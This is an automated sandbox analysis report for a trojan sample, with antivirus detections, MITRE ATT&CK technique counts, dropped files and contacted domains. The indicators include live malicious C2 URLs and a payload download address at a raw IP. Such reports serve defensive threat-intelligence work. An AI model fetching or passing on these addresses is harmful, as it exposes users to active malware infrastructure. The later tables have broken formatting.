    MITRE ATT&CK Matrix (per tactic; a number in parentheses is the count of matched signatures for that technique, techniques without a number are unmatched cells of the matrix)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
    Execution: Native API (2); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
    Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
    Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (11); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1); Indicator Removal from Tools
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
    Discovery: System Time Discovery (1); Query Registry (1); Security Software Discovery (131); Virtualization/Sandbox Evasion (1); Process Discovery (1); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (24)
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
    Collection: Screen Capture (1); Archive Collected Data (1); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
    Command and Control: Encrypted Channel (11); Ingress Tool Transfer (12); Non-Application Layer Protocol (2); Application Layer Protocol (123); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
    Source | Detection | Scanner | Label
    L7GNkeVm5e.exe | 39% | Virustotal |
    L7GNkeVm5e.exe | 50% | ReversingLabs | Win32.Trojan.CrypterX
    L7GNkeVm5e.exe | 100% | Avira | HEUR/AGEN.1312567
    L7GNkeVm5e.exe | 100% | Joe Sandbox ML |

    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | 50% | ReversingLabs | Win32.Trojan.CrypterX
    C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | 50% | ReversingLabs | Win32.Trojan.CrypterX

    No Antivirus matches

    No Antivirus matches

    Source | Detection | Scanner | Label
    https://robinsharez.shop:443/api | 100% | Avira URL Cloud | malware
    https://post-to-me.com/fh/0 | 100% | Avira URL Cloud | malware
    http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE | 0% | Avira URL Cloud | safe
    https://versersleep.shop:443/api | 100% | Avira URL Cloud | malware
    https://chipdonkeruz.shop:443/apih | 100% | Avira URL Cloud | malware
    https://crowdwarek.shop:443/api | 100% | Avira URL Cloud | malware
    http://176.113.115.19/ScreenUpdateSync.exe( | 0% | Avira URL Cloud | safe
    https://apporholis.shop:443/apiiP | 100% | Avira URL Cloud | malware
    https://skidjazzyric.click:443/api | 100% | Avira URL Cloud | malware

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    post-to-me.com | 172.67.179.207 | true | false | | high
    steamcommunity.com | 104.102.49.254 | true | false | | high
    femalsabler.shop | unknown | unknown | false | | high
    robinsharez.shop | unknown | unknown | false | | high
    soundtappysk.shop | unknown | unknown | false | | high
    crowdwarek.shop | unknown | unknown | false | | high
    versersleep.shop | unknown | unknown | false | | high
    skidjazzyric.click | unknown | unknown | false | | high
    chipdonkeruz.shop | unknown | unknown | false | | high
    apporholis.shop | unknown | unknown | false | | high
    handscreamny.shop | unknown | unknown | false | | high

    Name | Malicious | Antivirus Detection | Reputation
    robinsharez.shop | false | | high
    crowdwarek.shop | false | | high
    skidjazzyric.click | false | | high
    femalsabler.shop | false | | high
    https://steamcommunity.com/profiles/76561199724331900 | false | | high
    soundtappysk.shop | false | | high
    apporholis.shop | false | | high
    chipdonkeruz.shop | false | | high
    versersleep.shop | false | | high
    https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | high
    handscreamny.shop | false | | high

    Name | Source | Malicious | Antivirus Detection | Reputation
    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://player.vimeo.com | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://steamcommunity.com/?subsection=broadcasts | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://www.microsoft.co | EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.com/public/css/applications/community/m | EB86.tmp.exe, 00000002.00000002.2358880463.000000000064B000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168246436.0000000000648000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168282667.000000000064A000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://store.steampowered.com/subscriber_agreement/ | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://www.gstatic.cn/recaptcha/ | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://176.113.115.19/ScreenUpdateSync.exe | L7GNkeVm5e.exe, L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://www.valvesoftware.com/legal.htm | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://www.youtube.com | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://www.google.com | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE | L7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
    https://post-to-me.com/fh/0 | L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://s.ytimg.com; | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engliEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://steam.tv/EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://versersleep.shop:443/apiEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://post-to-me.com/track_prt.php?sub=&cc=DEL7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                              high
                                                                                              http://store.steampowered.com/privacy_agreement/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://store.steampowered.com/points/shop/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://sketchfab.comEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://lv.queniujq.cnEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.youtube.com/EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/privacy_agreement/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_AEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://post-to-me.com/track_prt.php?sub=L7GNkeVm5e.exefalse
                                                                                                              high
                                                                                                              https://robinsharez.shop:443/apiEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/recaptcha/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://checkout.steampowered.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://chipdonkeruz.shop:443/apihEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    unknown
                                                                                                                    https://post-to-me.com/L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://store.steampowered.com/;EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/about/EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/my/wishlist/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://help.steampowered.com/en/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com/market/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/news/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://steamcommunity.com/profiles/76561199724331900$EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://store.steampowered.com/subscriber_agreement/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://recaptcha.net/recaptcha/;EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=enEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/discussions/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/stats/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://medal.tvEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://broadcast.st.dl.eccdnx.comEB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/steam_refunds/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://crowdwarek.shop:443/apiEB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/workshop/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://login.steampowered.com/EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbEB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://store.steampowered.com/legal/EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviEEB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
URL | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
